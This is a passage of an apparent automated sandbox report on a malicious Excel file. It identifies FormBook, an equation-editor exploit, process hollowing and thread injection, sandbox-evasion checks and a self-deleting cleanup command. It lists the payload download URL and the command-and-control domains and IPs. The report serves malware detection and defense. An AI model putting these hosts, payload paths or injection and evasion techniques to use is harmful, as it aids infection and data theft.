          Source: explorer.exe, 00000008.00000000.502403681.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.505779530.0000000008415000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000y7
          Source: explorer.exe, 00000008.00000000.557021196.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000008.00000000.563171428.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BA26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 204.141.43.204 80
          Source: C:\Windows\explorer.exeDomain query: www.floridawp.com
          Source: C:\Windows\explorer.exeDomain query: www.atelifer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.129.2 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.187.86.150 80
          Source: C:\Windows\explorer.exeDomain query: www.viscoent.online
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Source: C:\Windows\explorer.exeDomain query: www.meta-bot.xyz
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: E20000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.488513124.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000008.00000000.488513124.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000008.00000000.488513124.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491441 Sample: RPM.xlsx Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 39 www.dermaqueeniran.com 2->39 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 15 other signatures 2->59 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 33 24 2->16         started        signatures3 process4 dnsIp5 47 23.95.13.176, 49167, 80 AS-COLOCROSSINGUS United States 11->47 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 1 5 11->18         started        37 C:\Users\user\Desktop\~$RPM.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Tries to detect virtualization through RDTSC time measurements 18->49 51 Injects a PE file into a foreign processes 18->51 21 vbc.exe 18->21         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 21->61 63 Maps a DLL or memory area into another process 21->63 65 Sample uses process hollowing technique 21->65 67 Queues an APC in another process (thread injection) 21->67 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.meta-bot.xyz 24->41 43 www.floridawp.com 107.187.86.150, 49169, 80 EGIHOSTINGUS United States 24->43 45 4 other IPs or domains 24->45 69 System process connects to network (likely due to code injection or exploit) 24->69 71 Performs DNS queries to domains with low reputation 24->71 28 svchost.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RPM.xlsx33%VirustotalBrowse
          RPM.xlsx29%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.meta-bot.xyz/scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJ0%Avira URL Cloudsafe
          www.vetpipes.com/scb0/0%Avira URL Cloudsafe
          http://23.95.13.176/rpm/vbc.exe0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://www.atelifer.com/scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJ0%Avira URL Cloudsafe
          http://www.floridawp.com/scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJ0%Avira URL Cloudsafe
          http://java.sun.com0%Avira URL Cloudsafe
          http://www.viscoent.online/scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJ0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          zhs.zohosites.com
          204.141.43.204
          truefalse
            high
            www.floridawp.com
            107.187.86.150
            truetrue
              unknown
              www.viscoent.online
              209.17.116.163
              truetrue
                unknown
                www.meta-bot.xyz
                203.170.129.2
                truetrue
                  unknown
                  www.dermaqueeniran.com
                  unknown
                  unknowntrue
                    unknown
                    www.atelifer.com
                    unknown
                    unknowntrue
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.meta-bot.xyz/scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJtrue
                      • Avira URL Cloud: safe
                      unknown
                      www.vetpipes.com/scb0/true
                      • Avira URL Cloud: safe
                      low
                      http://23.95.13.176/rpm/vbc.exetrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.atelifer.com/scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.floridawp.com/scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.viscoent.online/scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJtrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpfalse
                        high
                        http://kr.battle.net/heroes/ko/?https://twitter.com/Dalsae_info9https://twitter.com/hanalen_vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                          high
                          https://api.twitter.com/1.1/friendships/no_retweets/ids.jsonvbc.exefalse
                            high
                            https://pbs.twimg.com/media/vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                              high
                              http://kr.battle.net/heroes/ko/vbc.exefalse
                                high
                                http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.twitter.com/1.1/friendships/update.jsonvbc.exefalse
                                  high
                                  https://api.twitter.com/1.1/blocks/create.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                    high
                                    https://api.twitter.com/1.1/blocks/ids.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                      high
                                      https://api.twitter.com/1.1/statuses/unretweet/vbc.exefalse
                                        high
                                        http://treyresearch.netexplorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.twitter.com/1.1/statuses/user_timeline.jsonvbc.exefalse
                                          high
                                          https://upload.twitter.com/1.1/media/upload.jsonvbc.exefalse
                                            high
                                            https://api.twitter.com/1.1/statuses/unretweet/whttps://api.twitter.com/1.1/statuses/mentions_timelivbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                              high
                                              https://api.twitter.com/1.1/account/verify_credentials.jsonvbc.exefalse
                                                high
                                                http://www.icra.org/vocabulary/.explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.twitter.com/oauth/access_tokenvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                  high
                                                  http://investor.msn.com/explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpfalse
                                                    high
                                                    https://api.twitter.com/1.1/favorites/destroy.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                      high
                                                      https://api.twitter.com/1.1/statuses/retweet/vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                        high
                                                        https://api.twitter.com/1.1/statuses/destroy/vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                          high
                                                          https://api.twitter.com/1.1/statuses/home_timeline.jsonvbc.exefalse
                                                            high
                                                            http://computername/printers/printername/.printerexplorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.%s.comPAexplorer.exe, 00000008.00000000.497302771.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.680918872.0000000004310000.00000002.00020000.sdmpfalse
                                                            • URL Reputation: safe
                                                            low
                                                            http://www.autoitscript.com/autoit3explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpfalse
                                                              high
                                                              http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.561983563.0000000003E50000.00000002.00020000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://api.twitter.com/1.1/friends/list.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                high
                                                                http://www.windows.com/pctv.explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                  high
                                                                  https://api.twitter.com/1.1/direct_messages.jsonyhttps://api.twitter.com/1.1/friendships/no_retweetsvbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                    high
                                                                    http://investor.msn.comexplorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                      high
                                                                      http://wellformedweb.org/CommentAPI/explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://twitter.com/hanalen_vbc.exefalse
                                                                        high
                                                                        https://api.twitter.com/1.1/statuses/mentions_timeline.jsonvbc.exefalse
                                                                          high
                                                                          https://twitter.com/Dalsae_infovbc.exefalse
                                                                            high
                                                                            https://userstream.twitter.com/1.1/user.jsonvbc.exefalse
                                                                              high
                                                                              https://twitter.com/vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                high
                                                                                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                                  high
                                                                                  https://api.twitter.com/1.1/statuses/user_timeline.jsonwhttps://api.twitter.com/1.1/account/verify_cvbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                    high
                                                                                    https://api.twitter.com/1.1/statuses/update.jsonvbc.exefalse
                                                                                      high
                                                                                      https://api.twitter.com/1.1/users/lookup.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                        high
                                                                                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                                          high
                                                                                          http://java.sun.comexplorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000008.00000000.497302771.0000000001BE0000.00000002.00020000.sdmpfalse
                                                                                            high
                                                                                            https://api.twitter.com/1.1/statuses/show.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                              high
                                                                                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.492443400.000000000447A000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.562841566.0000000004513000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://api.twitter.com/1.1/favorites/create.jsonvbc.exefalse
                                                                                                    high
                                                                                                    https://api.twitter.com/oauth/authorize?oauth_token=vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.mozilla.orgexplorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpfalse
                                                                                                        high
                                                                                                        https://api.twitter.com/1.1/direct_messages.jsonvbc.exefalse
                                                                                                          high
                                                                                                          https://api.twitter.com/1.1/friends/ids.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                                            high
                                                                                                            https://api.twitter.com/1.1/favorites/list.jsonvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                                              high
                                                                                                              https://api.twitter.com/1.1/statuses/home_timeline.jsonahttps://upload.twitter.com/1.1/media/upload.vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                                                high
                                                                                                                https://api.twitter.com/oauth/request_tokenvbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmpfalse
                                                                                                                  high

                                                                                                                  Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  204.141.43.204
                                                                                                                  zhs.zohosites.comUnited States
                                                                                                                  2639ZOHO-ASUSfalse
                                                                                                                  23.95.13.176
                                                                                                                  unknownUnited States
                                                                                                                  36352AS-COLOCROSSINGUStrue
                                                                                                                  203.170.129.2
                                                                                                                  www.meta-bot.xyzThailand
                                                                                                                  9891CSLOX-IDC-AS-APCSLOXINFOPublicCompanyLimitedTHtrue
                                                                                                                  107.187.86.150
                                                                                                                  www.floridawp.comUnited States
                                                                                                                  18779EGIHOSTINGUStrue
                                                                                                                  209.17.116.163
                                                                                                                  www.viscoent.onlineUnited States
                                                                                                                  55002DEFENSE-NETUStrue

                                                                                                                  General Information

                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                  Analysis ID:491441
                                                                                                                  Start date:27.09.2021
                                                                                                                  Start time:15:38:47
                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                  Overall analysis duration:0h 12m 31s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:light
                                                                                                                  Sample file name:RPM.xlsx
                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                  Number of analysed new started processes analysed:11
                                                                                                                  Number of new started drivers analysed:2
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • HDC enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.expl.evad.winXLSX@9/12@7/5
                                                                                                                  EGA Information:Failed
                                                                                                                  HDC Information:
                                                                                                                  • Successful, ratio: 8.1% (good quality ratio 7.7%)
                                                                                                                  • Quality average: 68.5%
                                                                                                                  • Quality standard deviation: 27.1%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 96%
                                                                                                                  • Number of executed functions: 0
                                                                                                                  • Number of non-executed functions: 0
                                                                                                                  Cookbook Comments:
                                                                                                                  • Adjust boot time
                                                                                                                  • Enable AMSI
                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                  • Attach to Office via COM
                                                                                                                  • Scroll down
                                                                                                                  • Close Viewer
                                                                                                                  Warnings:
                                                                                                                  Show All
                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  15:39:41API Interceptor55x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                  15:39:44API Interceptor76x Sleep call for process: vbc.exe modified
                                                                                                                  15:40:09API Interceptor209x Sleep call for process: svchost.exe modified
                                                                                                                  15:40:59API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  209.17.116.163EhB2SUfLy2.exeGet hashmaliciousBrowse
                                                                                                                  • www.rouxbylarease.online/m0np/?l8=oxIwJMtdN1y/FRBHILHpPvint7tBupcci5UNNUbkxCPuhqZdw+PNI6+2ttaaOla44I+x&YZsPJr=HJEL06c80X
